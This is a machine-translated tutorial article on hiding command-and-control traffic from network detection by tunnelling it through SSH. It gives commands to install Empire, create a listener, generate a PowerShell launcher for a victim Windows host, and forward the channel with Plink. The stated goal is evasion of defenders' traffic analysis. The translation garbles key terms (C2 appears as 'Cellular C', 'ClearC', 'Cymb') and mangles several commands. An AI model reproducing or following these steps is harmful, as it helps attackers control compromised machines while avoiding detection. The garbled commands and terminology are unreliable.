Shulou(Shulou.com)06/01 Report--

How to use SSH tunnel encryption technology to conceal Cellular C communication traffic, many novices are not very clear about this. In order to help you solve this problem, the following editor will explain it in detail. People with this need can come and learn. I hope you can get something.

In the network attack and defense game, security defense measures such as network traffic characteristic analysis have been widely used. Many manufacturers and enterprises carry out malicious traffic analysis and detection of network traffic, so as to take targeted defense measures, such as all levels of ISP mostly adopt the defense scheme of network traffic analysis and detection on the backbone network equipment.

First, background introduction

In the network attack and defense game, security defense measures such as network traffic characteristic analysis have been widely used. Many manufacturers and enterprises carry out malicious traffic analysis and detection of network traffic, so as to take targeted defense measures, such as all levels of ISP mostly adopt the defense scheme of network traffic analysis and detection on the backbone network equipment.

This paper wants to establish an encrypted tunnel in the form of SSH through standard SSH port forwarding, which can be used to encrypt and conceal malicious traffic, so as to avoid finding malicious behavior through traffic detection. In the reappearance experiment part, the communication traffic of Cellular C is taken as an example to enter the experiment. Clipped C traffic encrypted and hidden through SSH tunnels shows only standard SSH traffic in external traffic characteristic analysis.

Second, experimental principle

This experiment uses the Empire tool to quickly build the Cellular C channel. This paper only briefly introduces the Empire tool. Under the Windows platform, use the SSH function of Plink.exe tool to build SSH tunnel.

2.1 introduction to SSH Tunnel

SSH automatically encrypts and decrypts network data between all SSH clients and servers. However, SSH can also forward the network number of other TCP ports through SSH links, and automatically provides corresponding encryption and decryption services. This process is also called "tunneling", which is named because SSH provides a secure channel for other TCP links to transmit. The implementation of SSH tunnel mainly uses the parameter configuration of SSH for port forwarding, that is, the data content to be transmitted is forwarded through the encrypted SSH tunnel. SSH port forwarding can provide two major functions: 1. Encrypt the communication data between the SSH Client side and the SSH Server side. 2. Break through the restrictions of the firewall to complete some TCP connections that could not be established before.

Because of the security of SSH, no one else can know the content of the data when it crosses the public network. There are three kinds of SSH port forwarding: local forwarding, remote forwarding and dynamic port forwarding. This experiment mainly takes local forwarding as an example.

Local forwarding is mainly explained by the-L parameter of SSH:

(1) in part 1, the-L option indicates that a ssh tunnel is established using "local forwarding". "local forwarding" means that communication data on a local port will be forwarded to the corresponding port of the target host.

(2) part 2 indicates that the communication data will be forwarded from local port 9906 and eventually forwarded to port 3306 at 10.1.0.2.

(3) part 3 says that the ssh tunnel we created is connected to root users on 10.1.0.2.

2.2 introduction to Empire tools

Empire is an infiltration attack framework that aims at windows platform and provides a series of complete functions from Stager generation to extraction and penetration maintenance. Its biggest feature is that it takes PowerShell script as the attack load, and Empire realizes that it can run PowerShell proxy function without power Shell .exe, that is, it is a pure PowerShell later vulnerability exploitation agent tool. Rapid deployment of post-vulnerability exploitation module, built-in modules include keylogger, Mimikatz, bypass UAC, intranet scanning, etc., and can adapt to communication evasion network detection and the detection and killing of most security protection tools. To put it simply, Empire is similar to the penetration artifact Metasploit, is a remote control Trojan based on PowerShell.

2.2 Empire tool installation

Install in the experimental virtual linux system

Git clone https://github.com/EmpireProject/Empire.git # enter the setup directory and install cd Empire cd setup sudo. / install.sh on the command line

After the installation is successful, make sure that all the files (directories) in the Empire directory are as shown below:

Using. / empire to start Empire as shown in the following figure, the installation is successful.

Third, the experimental steps

The experiment shows that two virtual machines ubuntu16 + windows 7 are used, in which ubuntu16 simulates the control side and windows 7 simulates the controlled host.

3.1Building SSH server on ubuntu system

(1) install Open-SSH Server

Sudo apt-get install openssh-server

(2) configure SSH Server

Edit the / etc/ssh/sshd_config file to allow password login PermitRootLogin configuration as shown below:

(3) Test whether SSH login is successful or not

Check the native IP (linux command: ifconfig). If you enter the login name and password by entering Server IP under the XShell tool under windows, if you log in to the system successfully, the SSH Server side will be built successfully.

Note: sshd service needs to be restarted: / etc/init.d/ssh resar

(4) configure RSA key pair authentication login

A) generate rsa key pair

Ssh-keygen-t rsa

B) enable sshd to support RSA authentication, and add the path address of authentication public key

C) the PubkeyAuthentication option in the edit / etc/ssh/sshd_config file is configured as yes, that is:

D) copy the public key to the .ss folder in a user's home directory. Note that you must use the following command to copy on the controlled host (win 7 is used for simulation in this experiment), otherwise the file permission settings are prone to errors.

Ssh-copy-id-I id_rsa.pub host login user name @ 192.168.81.137

E) use the private key for login ssh login

Ssh-I private key path host login user name @ 192.168.81.137

Note: when using putty, winscp and other tools, you need to use the corresponding platform tools to import the rsa private key and then convert it into the corresponding file format. For example, this experiment uses the putty tool to import and generate the private key file sshrsa.ppk.

3.2 use the Empire tool to generate a PowerShell script backup

The Empire tool is similar to Metasploit, and you can refer to an article to master PowerShell Empire for detailed tutorials.

In this experiment, Empire is used to generate a simple PowerShell script to establish the simplest Cellular C communication. The main steps are briefly summarized below.

(1) set up monitoring

Listeners # enter list to view the set monitoring uselistener http # enter info to view the required parameters set Name 4444 # this experiment communicates through SSH tunnel, so set to monitor 127.0.0.1 set Name 4444 set Port 4444 set Host 127.0.0.1 execute # create a monitor with a life of 4444, and listen for communication data on 127.0.0.1 info 4444

Examples are as follows:

(2) generate simple PowerShell utilization scripts (for windows)

Launcher powershell 4444 # 4444 can enter tagers to generate other Trojans and remote control programs. In this experiment, you can directly generate the simplest PowerShell utilization script.

Note: the generated Powershell code is copied and saved directly for execution on controlled windows hosts (win7, win10).

3.3.Construction of SSH tunnel

(1) use Plink.exe (command line in putty toolset for SSH connection on windows system) to connect SSHServer under windows.

# need to first enter the path where the Plink.exe file is located: Plink.exe-ssh-l login user name-pw login password SSH host IP

(2) parameters related to Plink

-ssh specifies to use a specific connection protocol-l specifies login user name-I specifies RSA private key login-L local forwarding

(3) Plink port forwarding design

Plink.exe-ssh-I sshrsa.ppk am00n@192.168.81.137-L 4444 sshrsa.ppk am00n@192.168.81.137 192.168.81.137purl 4444

Forward the local port (4444) to the destination port (4444) of the remote destination host (192.168.81.137).

Note: after the above command is executed successfully, you need to keep the command line open. At the same time, other parameters of SSH can be combined to run in the background, do not interact, and so on.

(4) use the PowerShell script generated in (2) to bring the controlled host online.

A) the windows 7 virtual machine opens a separate CMD window to copy the PowerShell script execution. You can see the controlled host above the line.

5) switch to the agents interface on ubuntu, and the list command is shown as shown in the figure:

6) through the interact command, you can use the established control channel to control the controlled host, such as successfully tested by a simple ls command, as shown below:

7) so far, the SSH tunnel can be successfully used to transmit Cellular communication traffic, on the basis of which other Cymb control commands and other malicious functions can be designed and implemented.

Through this experiment, we can see that attackers can use public services like SSH or available technologies to assist attacks, and its implementation is also very easy.

Summary of key steps:

(1) set up the SSH service and configure it to log in with RSA private key (which can also be configured as password-free login).

(2) use tools (such as Empire, Metasploit, etc.) to build ClearC.

(3) use the port forwarding of SSH to build SSH tunnel.

(4) configure ClearC and SSH parameters to achieve the purpose of encrypting and hiding malicious traffic.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.